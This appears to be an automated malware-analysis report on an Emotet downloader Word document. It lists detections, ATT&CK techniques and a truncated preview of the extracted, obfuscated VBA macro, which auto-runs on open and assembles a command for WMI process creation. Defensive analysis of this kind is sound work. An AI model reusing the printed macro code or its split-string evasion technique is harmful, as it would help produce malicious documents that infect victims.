MALICIOUS
322
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains VBA macros that are automatically executed upon opening the document, as indicated by the Document_Open macro firing. These macros utilize CreateObject and WMI (Win32_Process.Create) to launch a secondary payload, a common technique for Emotet. The obfuscation of 'winmgmts' via string splitting is also noted.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-7446350-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7446350-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7782 bytes |
SHA-256: 0cc6c5fff31f06bb0fcecd99705886e9240caced31af054ae6963550a269f902 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Zxxjxjovaqr"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Jiiexslvagg, 0, 0, MSForms, TextBox"
Private Sub Document_open()
For Kwasugscio = Wssocfvav To 0
Tluashoohrfo = (13 - Atn(51) - (44 + Round(41) * Tzofedkbbbv / CInt(1)))
Select Case Fplwrpdhhzfz
Case Zrqqdcyifhuq
Rjsfhoizwv = CLng(Mimzigkjkjkkr)
Wjdbaztpxgar = Oct(Avvcfqqwfy)
Case Hyiyioyul
Tozssotioexj = Imrdadfntrv
Ymtlalcbofyyh = Int(29)
End Select
Next
For Jvqetsoxiw = Dsylppwhvjdr To 0
Gnxtrwdj = (13 - Atn(51) - (44 + Round(41) * Zthdxlpm / CInt(1)))
Select Case Ohjfclbn
Case Rzrplaapeiotz
Wiskjurxjp = CLng(Rqgupvtm)
Rrwkahlp = Oct(Ptgciddfz)
Case Amxizxnyy
Kuqanztjl = Roxjdlmromyt
Zcajyrwbh = Int(29)
End Select
Next
For Qxigwrndrv = Fftcfouumz To 0
Ulupyceclgmoz = (13 - Atn(51) - (44 + Round(41) * Fdzgtofux / CInt(1)))
Select Case Eilmxrhmlk
Case Foqcyzsfcgipr
Whorwnmxvrzi = CLng(Nnuiftrdm)
Fvjxavvkykex = Oct(Ktqvlzrw)
Case Tnhltatvhxr
Avvdxxwi = Huabhaic
Uemojqxrjqwjs = Int(29)
End Select
Next
Noklzenjgrhgq
End Sub
Attribute VB_Name = "Igrwxpojox"
Attribute VB_Base = "0{E9ACC331-1C1F-49A3-9AE2-A44C2C08BCCB}{53B82310-DCAF-4DEE-A010-40008718495E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Vqilggfbgzoi"
Function Cokgnfjetbr()
For Jrbkbykicxea = Alwiwhxrndni To 0
Erbxozgrz = (13 - Atn(51) - (44 + Round(41) * Zwugekizljboq / CInt(1)))
Select Case Ysexwsvfel
Case Mpkjlukwk
Jteirudclt = CLng(Oncfferq)
Cwkbaqtghb = Oct(Udskdlaik)
Case Owwipertlp
Hyptnjfmagg = Nvafqmypmwfeh
Pijrumkl = Int(29)
End Select
Next
Ofhabstutwn = Zxxjxjovaqr.Jiiexslvagg
For Ywizgamajl = Rjlcnuycrtwv To 0
Xyuhoxspf = (13 - Atn(51) - (44 + Round(41) * Czxnzvnv / CInt(1)))
Select Case Eflitkzufana
Case Nfcwyacd
Kvapsyiz = CLng(Ttjyuntuavo)
Vztsrxxo = Oct(Lxyjjbgroyg)
Case Wdblgidvljtf
Frcecsfxaweks = Acvlgxop
Gxtaofdtdba = Int(29)
End Select
Next
Xeoehzegejesb = Ofhabstutwn + Igrwxpojox.Bgdqgfncxa + Igrwxpojox.Dxefrbwwqi + Igrwxpojox.Pvpdqeawxls
For Rimidsbjxo = Vxoqumtjbhqz To 0
Jmcnuvnep = (13 - Atn(51) - (44 + Round(41) * Kldwwdegmwo / CInt(1)))
Select Case Nwnuijrmdxj
Case Jtagrirck
Mfelsrjuinz = CLng(Svffbgnui)
Kggfgnldvxid = Oct(Tmopgtjwr)
Case Clbdnveqkaml
Ucwckksazhu = Bujopskdb
Hcdmufhakblrn = Int(29)
End Select
Next
Afwzgyujsgkf = Xeoehzegejesb + Igrwxpojox.Sbdlnwzbyge + Igrwxpojox.Kzrigfrssqbfk.ControlTipText
For Ymxdevkske = Awanynbwdehm To 0
Ybrhksfdyy = (13 - Atn(51) - (44 + Round(41) * Bwdlbfjjfew / CInt(1)))
Select Case Yzsiuflhsxj
Case Ucowxbyj
Ssdccmfue = CLng(Ltmuetehiyu)
Khvjgvthmtaqq = Oct(Vndebmjjb)
Case Hubegyhfrvrw
Fiyzmenrvm = Pjlbxthonzgh
Ilkmdqpv = Int(29)
End Select
Next
Cokgnfjetbr = Xoiomcuxhsgbs + Afwzgyujsgkf + Xoiomcuxhsgbs
For Dotyhzsa = Pllswdzhw To 0
Wacjpzlmqt = (13 - Atn(51) - (44 + Round(41) * Ccqvmdyqtwkh / CInt(1)))
Select Case Aoolcpor
Case Rpszgnsmtqi
Hndxoszqu = CLng(Zxxerggkvce)
Zjfeyoerji = Oct(Yszyhxwadajqn)
Case Jyvdcpsyfnu
Kxpopgtng = Eixiyzordau
Efiftulmfpp = Int(29)
End Select
Next
End Function
Function Noklzenjgrhgq()
For Wdzirawoqgjhc = Ycovyvxgjdnh To 0
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.